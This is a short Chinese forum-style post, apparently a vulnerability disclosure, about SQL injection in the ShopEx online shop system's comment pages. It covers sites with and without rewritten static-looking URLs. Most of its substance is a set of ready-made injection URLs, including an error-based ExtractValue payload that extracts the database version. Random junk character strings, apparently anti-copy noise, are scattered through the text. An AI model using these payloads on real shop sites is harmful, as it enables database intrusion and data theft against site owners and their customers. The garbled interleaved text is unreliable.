注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
9 D: S5 A7 T9 E6 E3 e. A8 n! [; @0 F5 N$ v1 G
好吧,我扯远了~~& c5 s) j$ L5 W! z
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~1 A9 A1 ?8 v6 R* }
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 9 W2 Y0 e/ ~1 X+ `& P
3 _5 m' H* ?' p* m6 S1 K0 t- g
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html % A& z3 J0 W, j% K) j3 x
3 J; V! ^# G* P) ]http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
% J9 M0 k" M& H$ ^+ t" i/ {+ ^, D, l
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
0 P; S+ W$ ?" y2 T7 K& o) q8 ]# ^# L V6 W3 F8 ]8 w. j) C+ D
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 6 j0 \! ] [8 J: X$ |/ E0 ~' h+ G
5 t* `/ l* F9 \$ q 0 {# Y+ a# E: N$ z7 W! ^
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。. A& W3 G6 ~. x0 q
如何注入就不多说了,10多年的东西了…不会也会了… z! |- m+ B7 Z4 B
& n# G/ p. X0 M) j* s/ D9 R0 B
+ s# J3 l9 C% R) R1 ^
, D& b. y) g/ k; d8 @3 N. ^
0 B, B, q5 }) v% R, h
|